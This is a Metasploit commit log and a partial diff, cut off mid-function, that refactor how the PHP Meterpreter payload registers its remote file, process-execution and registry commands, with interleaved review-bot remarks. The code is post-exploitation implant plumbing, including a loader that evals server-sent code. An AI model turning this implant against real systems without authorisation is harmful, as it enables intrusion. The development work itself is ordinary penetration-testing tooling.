Squashed commit of the following:

commit 6a3ad1d
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cb
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef256
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef765.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c3357
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b6583
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef4257
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef765
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976a
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab1
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 7483094
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e3597
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3cec
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001e
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e991
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d91
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb63
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 6461181
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a020
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecb
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes #6525]

commit a9a3023
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965c
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b5
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f471397
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See #6525]

commit cde7fcc
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves #6525 on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c4
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efa
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e8238
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b01
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d5719
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e3
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e15
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a364
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4c
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c0
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a3938
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074ead
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f6
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d306
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b326
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c5
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
commit 42719ab34bb9ca51d2cd623777662fc2253857f1 1 parent 55bb7ab
@egypt egypt authored
Showing with 571 additions and 356 deletions.
  1. BIN  data/meterpreter/ext_server_networkpug.lso
  2. BIN  data/meterpreter/ext_server_sniffer.lso
  3. 0  data/meterpreter/ext_server_stdapi.jar
  4. BIN  data/meterpreter/ext_server_stdapi.lso
  5. +48 −17 data/meterpreter/ext_server_stdapi.php
  6. BIN  data/meterpreter/meterpreter.jar
  7. +21 −3 data/meterpreter/meterpreter.php
  8. +18 −1 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/CommandManager.java
  9. +4 −2 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
  10. +6 −2 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/core/core_loadlib.java
  11. +9 −9 external/source/meterpreter/source/common/base.c
  12. +3 −3 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
  13. +2 −0  external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
  14. +9 −1 external/source/meterpreter/source/server/posix/remote_dispatch.c
  15. +10 −0 external/source/meterpreter/source/server/win/remote_dispatch.c
  16. +63 −53 lib/msf/core/post/file.rb
  17. +75 −128 lib/msf/core/post/linux/system.rb
  18. +16 −46 lib/msf/core/post/solaris/system.rb
  19. +22 −1 lib/rex/post/meterpreter/client.rb
  20. +9 −5 lib/rex/post/meterpreter/client_core.rb
  21. +10 −10 lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
  22. +8 −2 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
  23. +52 −20 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
  24. +28 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
  25. +59 −15 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
  26. +35 −5 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
  27. +19 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
  28. +9 −0 lib/rex/text.rb
  29. +11 −9 modules/auxiliary/server/browser_autopwn.rb
  30. +3 −0  modules/exploits/multi/browser/java_rhino.rb
  31. +4 −11 modules/post/osx/gather/enum_adium.rb
  32. +1 −1  test/modules/post/test/file.rb
  33. +16 −9 test/modules/post/test/meterpreter.rb
  34. +1 −1  test/modules/post/test/unix.rb
BIN  data/meterpreter/ext_server_networkpug.lso
Binary file not shown
BIN  data/meterpreter/ext_server_sniffer.lso
Binary file not shown
0  data/meterpreter/ext_server_stdapi.jar 100755 → 100644
File mode changed
BIN  data/meterpreter/ext_server_stdapi.lso
Binary file not shown
65 data/meterpreter/ext_server_stdapi.php
@@ -283,6 +283,7 @@ function cononicalize_path($path) {
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
+register_command('stdapi_fs_file_expand_path');
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
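Review bot: the new `register_command('stdapi_fs_file_expand_path');` call sits inside the `if (!function_exists(...))` guard, so on a second load of this file (when the function already exists) nothing is registered and core_loadlib reports no methods back; since register_command de-duplicates on its own, the call could live outside the guard. The same placement is used by every registration hunk in this file, so it is noted only once here.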
@@ -320,18 +321,8 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
}
}
-
-if (!function_exists('stdapi_fs_mkdir')) {
-function stdapi_fs_mkdir($req, &$pkt) {
- my_print("doing mkdir");
- $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
- $ret = mkdir(cononicalize_path($path_tlv['value']),0777);
- return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
-}
-}
-
-
if (!function_exists('stdapi_fs_delete_dir')) {
+register_command('stdapi_fs_delete_dir');
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
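Review bot: the stdapi_fs_mkdir block deleted here is re-added almost verbatim two hunks below, after stdapi_fs_delete_dir, which makes the diff read as a delete-plus-add rather than the reorder it is; keeping the function in its original position (and only adding the register_command line) would leave a one-line diff that is much easier to review.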
@@ -340,9 +331,19 @@ function stdapi_fs_delete_dir($req, &$pkt) {
}
}
+if (!function_exists('stdapi_fs_mkdir')) {
+register_command('stdapi_fs_mkdir');
+function stdapi_fs_mkdir($req, &$pkt) {
+ my_print("doing mkdir");
+ $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+ $ret = @mkdir(cononicalize_path($path_tlv['value']));
+ return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
# works
if (!function_exists('stdapi_fs_chdir')) {
+register_command('stdapi_fs_chdir');
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
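Review bot: the re-added stdapi_fs_mkdir drops the explicit `0777` mode and adds `@` error suppression: `$ret = @mkdir(cononicalize_path($path_tlv['value']));`. PHP's default mode is 0777 (masked by umask), so the created directory is unchanged, but silencing the warning hides the reason for a failure that reaches the client only as ERROR_FAILURE; a short comment explaining why the warning is suppressed, plus a my_print of the failing path, would keep this debuggable.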
@@ -353,6 +354,7 @@ function stdapi_fs_chdir($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete')) {
+register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -363,6 +365,7 @@ function stdapi_fs_delete($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_getwd')) {
+register_command('stdapi_fs_getwd');
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@@ -373,6 +376,7 @@ function stdapi_fs_getwd($req, &$pkt) {
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
+register_command('stdapi_fs_ls');
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -413,6 +417,7 @@ function stdapi_fs_ls($req, &$pkt) {
}
if (!function_exists('stdapi_fs_separator')) {
+register_command('stdapi_fs_separator');
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
@@ -420,6 +425,7 @@ function stdapi_fs_separator($req, &$pkt) {
}
if (!function_exists('stdapi_fs_stat')) {
+register_command('stdapi_fs_stat');
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -452,6 +458,7 @@ function stdapi_fs_stat($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete_file')) {
+register_command('stdapi_fs_delete_file');
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -467,6 +474,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
}
if (!function_exists('stdapi_fs_search')) {
+register_command('stdapi_fs_search');
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
@@ -506,6 +514,7 @@ function stdapi_fs_search($req, &$pkt) {
if (!function_exists('stdapi_fs_md5')) {
+register_command("stdapi_fs_md5");
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
@@ -524,6 +533,7 @@ function stdapi_fs_md5($req, &$pkt) {
if (!function_exists('stdapi_fs_sha1')) {
+register_command("stdapi_fs_sha1");
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
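Review bot: `register_command("stdapi_fs_sha1");` here and `register_command("stdapi_fs_md5");` in the previous hunk use double-quoted strings while every other registration in this file uses single quotes; switch both to single quotes for consistency.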
@@ -545,6 +555,7 @@ function stdapi_fs_sha1($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_config_getuid')) {
+register_command('stdapi_sys_config_getuid');
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
@@ -563,15 +574,17 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
# Unimplemented becuase it's unimplementable
-if (!function_exists('stdapi_sys_config_rev2self')) {
-function stdapi_sys_config_rev2self($req, &$pkt) {
- my_print("doing rev2self");
- return ERROR_FAILURE;
-}
-}
+#if (!function_exists('stdapi_sys_config_rev2self')) {
+#register_command('stdapi_sys_config_rev2self');
+#function stdapi_sys_config_rev2self($req, &$pkt) {
+# my_print("doing rev2self");
+# return ERROR_FAILURE;
+#}
+#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
+register_command('stdapi_sys_config_sysinfo');
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
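Review bot: commenting out the whole stdapi_sys_config_rev2self block with `#` leaves seven lines of dead code; delete them and keep only the explanatory comment above (which should also read "because" rather than "becuase"). Not registering the command is the right outcome: the client now builds its command list from what the server reports, so the console simply will not expose rev2self on PHP sessions instead of offering a command that always fails.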
@@ -584,6 +597,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
+register_command('stdapi_sys_process_execute');
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
@@ -658,6 +672,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
if (!function_exists('stdapi_sys_process_close')) {
+register_command('stdapi_sys_process_close');
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
@@ -711,6 +726,7 @@ function close_process($proc) {
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
+register_command('stdapi_sys_process_get_processes');
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
@@ -760,6 +776,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_process_getpid')) {
+register_command('stdapi_sys_process_getpid');
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@@ -768,6 +785,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
}
if (!function_exists('stdapi_sys_process_kill')) {
+register_command('stdapi_sys_process_kill');
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
@@ -798,6 +816,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
+register_command('stdapi_net_socket_tcp_shutdown');
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@@ -838,6 +857,9 @@ function deregister_registry_key($id) {
if (!function_exists('stdapi_registry_create_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_create_key');
+}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
if (is_windows() and is_callable('reg_open_key')) {
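Review bot: the `is_windows() and is_callable('reg_open_key')` test is now evaluated twice per registry function, once around register_command and once inside the function body, and the same pair is repeated in the three registry hunks that follow; factoring it into a helper such as `function have_registry() { return is_windows() and is_callable('reg_open_key'); }` would keep the registration gate and the runtime check from drifting apart when one of them is edited later.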
@@ -871,6 +893,9 @@ function stdapi_registry_create_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_close_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_close_key');
+}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@@ -889,6 +914,9 @@ function stdapi_registry_close_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_query_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_query_value');
+}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@@ -926,6 +954,9 @@ function stdapi_registry_query_value($req, &$pkt) {
}
if (!function_exists('stdapi_registry_set_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+ register_command('stdapi_registry_set_value');
+}
function stdapi_registry_set_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
BIN  data/meterpreter/meterpreter.jar 100755 → 100644
Binary file not shown
24 data/meterpreter/meterpreter.php
@@ -30,6 +30,18 @@
$GLOBALS['readers'] = array();
}
+# global list of extension commands
+if (!isset($GLOBALS['commands'])) {
+ $GLOBALS['commands'] = array("core_loadlib");
+}
+
+function register_command($c) {
+ global $commands;
+ if (! in_array($c, $commands)) {
+ array_push($commands, $c);
+ }
+}
+
function my_print($str) {
#error_log($str);
}
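Review bot: `register_command` uses loose `in_array($c, $commands)`; command names are strings, and PHP compares numeric-looking strings numerically under loose comparison, so pass `true` as the third argument for a strict match. Also, the comment introduces this as the "global list of extension commands", yet it is seeded with `"core_loadlib"`, a core handler; either seed it with every core_* handler defined in this file or add a comment explaining why only core_loadlib belongs in the list.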
@@ -389,14 +401,20 @@ function core_shutdown($req, &$pkt) {
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
+ global $commands;
